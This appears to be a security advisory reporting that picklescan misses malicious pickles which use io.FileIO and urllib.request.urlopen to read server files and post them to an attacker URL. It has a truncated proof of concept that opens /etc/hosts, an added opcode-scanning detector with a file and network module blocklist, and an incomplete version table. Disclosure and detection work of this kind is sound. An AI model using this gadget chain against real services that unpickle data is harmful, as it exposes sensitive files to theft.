Server-side request forgery (SSRF) in picklescan
Description
picklescan has arbitrary file read using io.FileIO
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
```python
import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):...
```
Impact
Arbitrary file read
Thanks for this library and your time. If you think picklescan is focused on detecting only RCE-type vulnerabilities, and that adding file I/O, HTTP or other protocol-based checks may cause a lot of noise, feel free to close this issue.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
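A static check for the gap described under Details, as an added example that is not picklescan's own code: it walks the pickle opcodes with `pickletools.genops`, never unpickling, and flags imports from file and network modules. The module list, the function names and the `ReadsFile` sample class are assumptions made for this illustration.

```python
import io
import pickle
import pickletools

# Assumed policy for this example (not picklescan's list): modules that give
# file or network access without touching os, subprocess or builtins.
# "_io" is listed because io.FileIO.__module__ is "_io", and that is the
# module name that ends up in the pickle stream.
FILE_NET_MODULES = {"io", "_io", "urllib", "http", "socket", "ftplib", "smtplib"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def imported_globals(data):
    """Yield (module, name) for every import opcode, without unpickling."""
    strings = []  # string pushes seen so far; operands for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            yield module, name
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Simplification: assumes the operands are the two most recent
            # string pushes, which holds for output of pickle.dumps.
            yield strings[-2], strings[-1]


def file_net_findings(data):
    """Return imports whose top-level module is in FILE_NET_MODULES."""
    return [(module, name) for module, name in imported_globals(data)
            if module.split(".")[0] in FILE_NET_MODULES]


class ReadsFile:
    # Constructed sample with the same shape as GetFile in the PoC.
    def __reduce__(self):
        return (io.FileIO, ("/etc/hosts", "r"))


def constructed_sample(protocol):
    """Bytes only: pickle.dumps records the reference, nothing is opened."""
    return pickle.dumps(ReadsFile(), protocol=protocol)


if __name__ == "__main__":
    for proto in (3, 4):  # GLOBAL opcode vs. STACK_GLOBAL opcode
        print(proto, file_net_findings(constructed_sample(proto)))
```

A blocklist entry for `io` alone would not match this sample, since the recorded module is `_io`.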
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
pypi | 0.0.35 |